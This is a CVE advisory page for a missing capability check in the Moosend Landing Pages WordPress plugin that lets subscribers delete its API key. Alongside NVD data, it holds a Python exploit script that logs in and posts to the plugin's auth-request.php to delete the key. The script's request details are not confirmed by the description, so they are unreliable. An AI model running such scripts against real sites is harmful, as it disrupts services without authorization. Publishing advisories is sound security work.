Security Vulnerability Report
CVE-2025-13496 CVSS 5.3 MEDIUM

Published: 2026-01-07 12:16:48
Last Modified: 2026-04-15 00:35:42

Description

The Moosend Landing Pages plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the moosend_landings_auth_get function in all versions up to, and including, 1.1.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete the 'moosend_landing_api_key' option value.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Moosend Landing Pages plugin for WordPress <= 1.1.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2025-13496 PoC - Moosend Landing Pages Auth Bypass
# Target: WordPress site with Moosend Landing Pages plugin <= 1.1.6

TARGET_URL = "http://target-wordpress-site.com"
USERNAME = "subscriber_user"
PASSWORD = "subscriber_password"


def exploit_cve_2025_13496():
    """
    This PoC demonstrates the unauthorized deletion of moosend_landing_api_key option.
    The vulnerability exists due to missing capability check in moosend_landings_auth_get function.
    """
    session = requests.Session()

    # Step 1: Login as subscriber-level user
    login_url = f"{TARGET_URL}/wp-login.php"
    login_data = {
        'log': USERNAME,
        'pwd': PASSWORD,
        'wp-submit': 'Log In',
        'redirect_to': f"{TARGET_URL}/wp-admin/"
    }
    login_response = session.post(login_url, data=login_data)

    if 'wordpress_logged_in' not in session.cookies:
        print("[-] Login failed")
        return False

    print("[+] Login successful as subscriber")

    # Step 2: Send request to vulnerable endpoint to delete API key
    # The vulnerable function: moosend_landings_auth_get
    # Located at: /forms/auth-request.php
    vuln_url = f"{TARGET_URL}/wp-content/plugins/moosend-landing-pages/forms/auth-request.php"

    # Send DELETE request to remove moosend_landing_api_key option
    delete_data = {
        'action': 'moosend_landings_auth_get',
        'option_name': 'moosend_landing_api_key'
    }
    response = session.post(vuln_url, data=delete_data)

    if response.status_code == 200:
        print("[+] Successfully deleted moosend_landing_api_key option")
        print("[+] Plugin API key has been removed - service disruption achieved")
        return True
    else:
        print(f"[-] Request failed with status: {response.status_code}")
        return False


if __name__ == "__main__":
    exploit_cve_2025_13496()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13496", "sourceIdentifier": "[email protected]", "published": "2026-01-07T12:16:48.183", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Moosend Landing Pages plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the moosend_landings_auth_get function in all versions up to, and including, 1.1.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete the 'moosend_landing_api_key' option value."}, {"lang": "es", "value": "El plugin Moosend Landing Pages para WordPress es vulnerable a la modificación no autorizada de datos debido a una falta de verificación de capacidad en la función moosend_landings_auth_get en todas las versiones hasta la 1.1.6, inclusive. Esto hace posible que atacantes autenticados, con acceso de nivel Suscriptor y superior, eliminen el valor de la opción 'moosend_landing_api_key'."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/moosend-landing-pages/tags/1.1.6/forms/auth-request.php#L7", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/moosend-landing-pages/trunk/forms/auth-request.php#L7", "source": "[email protected]"}, {"url": 
"https://www.wordfence.com/threat-intel/vulnerabilities/id/eeb4b3b1-47ae-4314-a386-832949456f81?source=cve", "source": "[email protected]"}]}}